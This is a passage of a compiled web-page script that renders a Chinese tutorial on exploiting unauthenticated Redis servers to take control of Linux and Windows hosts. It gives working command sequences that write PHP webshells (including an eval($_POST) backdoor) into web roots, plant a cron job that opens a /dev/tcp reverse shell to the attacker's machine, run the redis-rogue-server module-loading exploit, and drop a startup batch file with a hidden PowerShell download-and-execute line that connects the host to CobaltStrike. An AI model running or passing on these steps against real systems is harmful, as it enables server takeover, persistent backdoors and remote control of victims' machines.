number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" \n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br"),e("span",{staticClass:"line-number"},[s._v("10")]),e("br"),e("span",{staticClass:"line-number"},[s._v("11")]),e("br"),e("span",{staticClass:"line-number"},[s._v("12")]),e("br"),e("span",{staticClass:"line-number"},[s._v("13")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1030),alt:"img"}})]),s._v(" "),e("ul",[e("li",[s._v("✅如上则为成功写入SSH密钥文件,攻击机可无需密码远程连接目标主机SSH")])]),s._v(" "),e("h3",{attrs:{id:"webshell"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#webshell"}},[s._v("#")]),s._v(" WebShell")]),s._v(" "),e("p",[s._v("当SSH不允许远程登录时,也可以通过写入 Web目录控制目标主机")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v('┌──(root💀kali)-[~/.ssh]\n└─# redis-cli -h 192.168.0.126 -p 6379\n192.168.0.126:6379> config set dir /var/www/html\nOK\n192.168.0.126:6379> config set dbfilename xxx.php\nOK\n192.168.0.126:6379> set web "\\r\\n\\r\\n'),e("span",{pre:!0,attrs:{class:"token php language-php"}},[e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("<?php")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token function"}},[s._v("phpinfo")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(";")]),e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("?>")])]),s._v('\\r\\n\\r\\n"\nOK\n192.168.0.126:6379> save\nOK\n')])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br"),e("span",{staticClass:"line-number"},[s._v("10")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1031),alt:"img"}})]),s._v(" "),e("h3",{attrs:{id:"定时任务"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#定时任务"}},[s._v("#")]),s._v(" 定时任务")]),s._v(" "),e("p",[s._v("也可以通过写入定时任务反弹Shell,获取权限")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("攻击机监听端口 ")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("nc -lvvp 9999")]),e("br"),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" set test2 "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\\n\\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.0.140/9999 0>&1\\n\\n"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dir "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("var")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),s._v("spool"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),s._v("cron\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dbfilename root\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" save\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" \n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1032),alt:"img"}})]),s._v(" "),e("h3",{attrs:{id:"主从复制"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#主从复制"}},[s._v("#")]),s._v(" 主从复制")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("如果当把数据存储在单个Redis的实例中,当读写体量比较大的时候,服务端就很难承受。")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("为了应对这种情况,Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式")]),e("br"),s._v(" "),e("p",[s._v("Redis未授权访问在4.x/5.0.5以前版本,我们可以使用主/从模式加载远程模块,通过动态链接库的方式执行任意命令。")]),s._v(" "),e("p",[s._v("关于漏洞原理请查看"),e("a",{attrs:{href:"https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf",target:"_blank",rel:"noopener noreferrer"}},[s._v("Pavel Toporkov的分享"),e("OutboundLink")],1)]),s._v(" "),e("p",[s._v("漏洞利用脚本: "),e("a",{attrs:{href:"https://github.com/n0b0dyCN/redis-rogue-server",target:"_blank",rel:"noopener noreferrer"}},[s._v("n0b0dyCN/redis-rogue-server"),e("OutboundLink")],1)]),s._v(" "),e("div",{staticClass:"language-shell line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-shell"}},[e("code",[s._v("➜ ./redis-rogue-server.py -h\n______ _ _ ______ _____ \n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" ___ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" ___ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" / ___"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("_/ /___ __"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("_ ___ "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("_/ /___ __ _ _ _ ___ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token variable"}},[e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("`")]),s._v("--. ___ _ ____ _____ _ __ \n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" // _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("/ _"),e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("`")])]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" / __"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" // _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" / _"),e("span",{pre:!0,attrs:{class:"token variable"}},[e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("`")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("/ _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("`")])]),s._v("--. "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("/ _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token string"}},[s._v("'__\\ \\ / / _ \\ '")]),s._v("__"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" __/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("__ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" __/ /"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("__/ / __/ "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" V / __/ "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("___"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("__,_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("___/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("___/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("__, "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("__,_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("___"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("____/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("___"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("_/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("___"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("_"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n __/ "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("___/ \n@copyright n0b0dy @ r3kapig\n\nUsage: redis-rogue-server.py "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),s._v("options"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),s._v("\n\nOptions:\n -h, --help show this "),e("span",{pre:!0,attrs:{class:"token builtin class-name"}},[s._v("help")]),s._v(" message and "),e("span",{pre:!0,attrs:{class:"token builtin class-name"}},[s._v("exit")]),s._v("\n --rhost"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("REMOTE_HOST target "),e("span",{pre:!0,attrs:{class:"token function"}},[s._v("host")]),s._v("\n --rport"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("REMOTE_PORT target redis port, default "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),s._v("\n --lhost"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("LOCAL_HOST rogue server "),e("span",{pre:!0,attrs:{class:"token function"}},[s._v("ip")]),s._v("\n --lport"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("LOCAL_PORT rogue server listen port, default "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("21000")]),s._v("\n --exp"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("EXP_FILE Redis Module to load, default exp.so\n -v, --verbose Show full data stream\nExample\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br"),e("span",{staticClass:"line-number"},[s._v("10")]),e("br"),e("span",{staticClass:"line-number"},[s._v("11")]),e("br"),e("span",{staticClass:"line-number"},[s._v("12")]),e("br"),e("span",{staticClass:"line-number"},[s._v("13")]),e("br"),e("span",{staticClass:"line-number"},[s._v("14")]),e("br"),e("span",{staticClass:"line-number"},[s._v("15")]),e("br"),e("span",{staticClass:"line-number"},[s._v("16")]),e("br"),e("span",{staticClass:"line-number"},[s._v("17")]),e("br"),e("span",{staticClass:"line-number"},[s._v("18")]),e("br"),e("span",{staticClass:"line-number"},[s._v("19")]),e("br"),e("span",{staticClass:"line-number"},[s._v("20")]),e("br"),e("span",{staticClass:"line-number"},[s._v("21")]),e("br"),e("span",{staticClass:"line-number"},[s._v("22")]),e("br")])]),e("div",{staticClass:"language-shell line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-shell"}},[e("code",[s._v("python3 redis-rogue-server.py --rhost "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),s._v(".51.146 --lhost "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),s._v(".51.146 --exp"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("exp.so\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1033),alt:"img"}})]),s._v(" "),e("p",[e("img",{attrs:{src:a(1034),alt:"img"}})]),s._v(" "),e("h2",{attrs:{id:"windows-获取权限"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#windows-获取权限"}},[s._v("#")]),s._v(" Windows 获取权限")]),s._v(" "),e("h3",{attrs:{id:"webshell-2"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#webshell-2"}},[s._v("#")]),s._v(" Webshell")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("攻击成功的前提为:需要准确的知道Web目录位置")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("可通过 phpinfo 或者 网站报错得知")]),e("br"),s._v(" "),e("p",[e("img",{attrs:{src:a(1035),alt:"img"}})]),s._v(" "),e("p",[s._v("这里测试的目标路径为:"),e("code",[s._v("C:\\phpstudy_pro\\WWW")])]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v('192.168.0.123:6379> config set dir C:\\phpstudy_pro\\WWW\nOK\n192.168.0.123:6379> config set dbfilename shell.php\nOK\n192.168.0.123:6379> set test "'),e("span",{pre:!0,attrs:{class:"token php language-php"}},[e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("<?php")]),s._v(" @"),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("eval")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("$_POST")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),e("span",{pre:!0,attrs:{class:"token string single-quoted-string"}},[s._v("'shell'")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("?>")])]),s._v('"\nOK\n192.168.0.123:6379> save\nOK\n')])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1036),alt:"img"}})]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("成功写入木马,并可连接控制服务器")]),e("br"),s._v(" "),e("p",[e("img",{attrs:{src:a(1037),alt:"img"}})]),s._v(" "),e("h3",{attrs:{id:"启动项"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#启动项"}},[s._v("#")]),s._v(" 启动项")]),s._v(" "),e("p",[s._v("攻击方法与写入Linux启动项相似")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("需要高权限账户")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("Windows 启动项目录为:")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp")]),e("br"),s._v(" "),e("p",[s._v("首先创建 CobaltStrike监听")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("`Attacks -> Web Drive-By -> Script Web Delivery`")]),e("br"),s._v(" "),e("p",[e("img",{attrs:{src:a(1038),alt:"img"}})]),s._v(" "),e("p",[s._v("生成 Powershell 语句")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("powershell"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("exe "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("nop "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("w hidden "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("c "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v("\"IEX ((new-object net.webclient).downloadstring('http://192.168.0.126:6666/a'))\"")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[s._v("执行Redis命令写入语句")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dir "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dbfilename cmd"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("bat\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" set x "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\\r\\n\\r\\npowershell.exe -nop -w hidden -c \\"IEX ((new-object net.webclient).downloadstring(\'http://192.168.0.126:6666/a\'))\\"\\r\\n\\r\\n"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" save\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br")])]),e("p",[s._v("当主机重启时就会执行命令上线 CobaltStrike")]),s._v(" "),e("p",[e("img",{attrs:{src:a(1039),alt:"img"}})])],1)}),[],!1,null,null,null);t.default=r.exports}}]);
